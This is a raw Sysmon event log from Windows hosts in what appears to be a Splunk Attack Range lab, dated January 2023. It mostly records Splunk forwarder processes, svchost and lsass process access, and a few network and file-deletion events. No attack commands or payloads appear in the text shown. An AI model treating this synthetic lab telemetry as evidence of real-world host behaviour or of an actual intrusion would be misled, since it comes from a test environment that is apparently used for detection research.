--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000041033Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.444{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F738C6041547FB6A8CE1B0AEE7A3F878,SHA256=C58C08FFCFA630515983F63EB77E6C6DDC5BF5CB3333D17EEDAAEB22D6996FD8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041032Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.241{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 354300x800000000000000041031Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:29.553{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56263-false10.0.1.12-8000- 10341000x800000000000000041096Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.938{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E3D5-63C7-1806-00000000AF02}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041095Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.938{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041094Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.938{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041093Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.938{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041092Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.938{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041091Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.938{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E3D5-63C7-1806-00000000AF02}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041090Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.938{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E3D5-63C7-1806-00000000AF02}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000041089Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.937{FE4C2B44-E3D5-63C7-1806-00000000AF02}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000041088Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.568{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2D288693A9070E444A229479CE5326A,SHA256=462C1D91E96A9947D96D5FAFAD416A953C44FB323328407CD5AE5955445F4C33,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015850Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:33.500{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=429C167E634FD6E13223C5A9DE9740C4,SHA256=552E842BED75384B81A649BBB3B2F1E965AB76A4508CF2122EDA592DB40AA114,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000015849Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:33.109{E5A8D418-E3D4-63C7-F301-00000000B002}35562900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041087Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.444{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-D9F1-63C7-0100-00000000AF02}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\kerberos.DLL+97b62|C:\Windows\system32\kerberos.DLL+79e38|C:\Windows\system32\kerberos.DLL+144ff|C:\Windows\system32\lsasrv.dll+2fa11|C:\Windows\system32\lsasrv.dll+2d8f6|C:\Windows\system32\lsasrv.dll+33189|C:\Windows\system32\lsasrv.dll+30ad7|C:\Windows\system32\lsasrv.dll+2fa11|C:\Windows\system32\lsasrv.dll+17a7d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x800000000000000041086Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041085Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041084Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041083Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041082Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041081Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041080Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041079Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041078Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041077Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041076Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041075Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041074Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041073Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041072Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:33.365{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041071Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 